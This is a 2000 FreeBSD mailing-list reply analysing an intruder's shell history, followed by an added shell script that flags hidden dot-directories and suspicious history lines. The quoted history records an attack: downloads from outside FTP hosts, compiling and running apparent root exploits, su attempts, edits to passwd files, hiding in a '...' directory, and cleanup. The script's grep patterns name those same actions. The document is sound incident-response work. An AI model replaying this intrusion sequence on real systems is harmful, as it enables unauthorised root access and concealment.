Date: Mon, 18 Dec 2000 12:43:26 -0800
From: David <davidd@datasphereweb.com>
To: "Gerald T. Freymann" <freymann@eagle.ca>
Cc: Questions <questions@FreeBSD.ORG>
Subject: Re: Hacker history file - OUCH
Message-ID: <20001218124326.A552@datasphereweb.com>
In-Reply-To: <NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann@eagle.ca>; from freymann@eagle.ca on Mon, Dec 18, 2000 at 03:06:32PM -0500
References: <NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann@eagle.ca>
On Mon, Dec 18, 2000 at 03:06:32PM -0500, Gerald T. Freymann wrote:
> Seems we have an intruder on one of our boxes... the .history file from the
> troubled account follows:
>
> cd bnc
> ls
> ./bash
> who
> cd /etc
> more passwd
> ps -l
> ls -l
> more pwd.db
> more hosts

Looks like he's just storing stuff into his telnet buffer for recovery later.

> pico adduser.conf.bak
> pico group
> su user
> pico group.bak
> pico ftpuser
> O
> pico ftpusers
> su toor
> su operator
> id
> pico spwd.db
> su wheel
> pico passwd

I think this is fairly obvious :)

> cd /var/tmp
> ls -a
> cd ...
> ls -a
> cd ..
> ls -l
> ls -al
> cd ...

Ok, the 'cd ...' is where you need to be looking. I would venture to guess
that if you go into /var/tmp you'll see an odd . directory. When you do an
ls -al you should only see . and .. A lot of system crackers will hide stuff
in these types of directories, which are easy to overlook. I think once you
find this directory you can determine what a lot of the rest of this does.

> ftp copper.he.net
> chmod u+x xcon
> ./xcon
> id
> rm *
> ls
> who
> cd /var/tmp
> ls -a
> ls -al
> cd ...
> ls -a
> ftp cih.edu.mx
> ls
> cc bsd1 bsd-cron.c
> cc -o bsd1 bsd-cron.c
> ./bsd1
> id
> cc -o bsd2 bsd2.c
> ./bsd2
> id
> ls
> ftp cih.edu.mx
> ./bsd sh
> ./bsd.sh
> chmod u+x bsd.sh
> ./bsd.sh
> /tmp/sh
> id
> ls
> cc -o bsdsmail bsdsmail.c
> ./bsdsmail
> ls -a
> pico hack
> ls
> pico user.inf
> ls
> id
> rm *
> exit

The rest of this is just him ftp'ing some source files and building them on
your system. What they are...I don't know.

-- 
|> /\ \/ @   davidd@datasphereweb.com
DataSphere - Back end web programming, site security, and networking
david.daugherty@netmanage.com   Software Engineer
NetManage - The Bridge to E-Business
http://www.wcug.wwu.edu/~doc   ICQ: 21106703
"I like the dreams of the future better than the history of the past"
  -Thomas Jefferson

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20001218124326.A552>
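The two checks David suggests in the thread, looking for the odd dot-named directory under /var/tmp and picking the telling lines out of the account's .history, as an added POSIX sh example. This is not code from the thread or from FreeBSD; the default path, the tags it prints and the pattern list are assumptions for illustration, and the sample history it runs on at the bottom is constructed, not the one Gerald posted. It generalizes a little beyond the thread: besides names made only of dots (the "..." the intruder used), it also flags dot-names padded with whitespace, which hide the same way in "ls -al" output.

```shell
#!/bin/sh
# Added example, not from the thread or from FreeBSD. Default directory,
# output tags and grep patterns are illustration-only assumptions.

# List directories under $1 (default /var/tmp) whose names begin with a dot,
# other than the legitimate "." and "..". Names made only of dots, or a
# dot-name containing whitespace, are tagged SUSPECT because they sit next
# to "." and ".." in "ls -al" and are easy to overlook; any other hidden
# directory in a world-writable temp area is tagged HIDDEN for a look.
find_odd_dotdirs() {
    dir=${1:-/var/tmp}
    # Walk one level with a glob loop rather than find -mindepth, which is
    # not POSIX, so this also runs on a stock /bin/sh.
    for entry in "$dir"/.*; do
        name=${entry##*/}
        case "$name" in
            .|..) continue ;;          # the only two dot entries that belong
        esac
        [ -d "$entry" ] || continue    # only directories are of interest here
        case "$name" in
            ...*|.*[[:space:]]*) printf 'SUSPECT %s\n' "$entry" ;;
            *)                   printf 'HIDDEN  %s\n' "$entry" ;;
        esac
    done
}

# Print, with line numbers, the lines of a history file that match the
# patterns seen in the posted .history: hops into dots-only directories,
# su to unusual accounts, editing of the authentication files in /etc, and
# compiling sources from a shell that should not be building anything.
# Crude triage, not a rule: a legitimate admin may trip some of these.
flag_history() {
    grep -nE \
        -e '^cd +\.\.\.+' \
        -e '^su +(toor|operator|wheel)$' \
        -e '^(pico|vi|ee) +(master\.passwd|passwd|group|spwd\.db|pwd\.db|ftpusers|adduser\.conf)' \
        -e '^cc +' \
        "$1"
}

# Stand-alone demo on a constructed layout and history (not Gerald's file).
demo() {
    work=$(mktemp -d)
    mkdir "$work/..." "$work/.cache"
    printf 'who\ncd /var/tmp\ncd ...\nsu toor\ncd /etc\npico passwd\ncc -o bsd1 bsd-cron.c\n' \
        > "$work/history"
    echo "== hidden directories under $work"
    find_odd_dotdirs "$work"
    echo "== flagged history lines"
    flag_history "$work/history"
    rm -rf "$work"
}
demo
```

Run it as a normal user to see the demo, or source the file and call find_odd_dotdirs on /tmp and /var/tmp and flag_history on the suspect account's history; anything tagged SUSPECT deserves a look at its contents and timestamps before it is touched, since the history shows the intruder cleaning up with rm * once done.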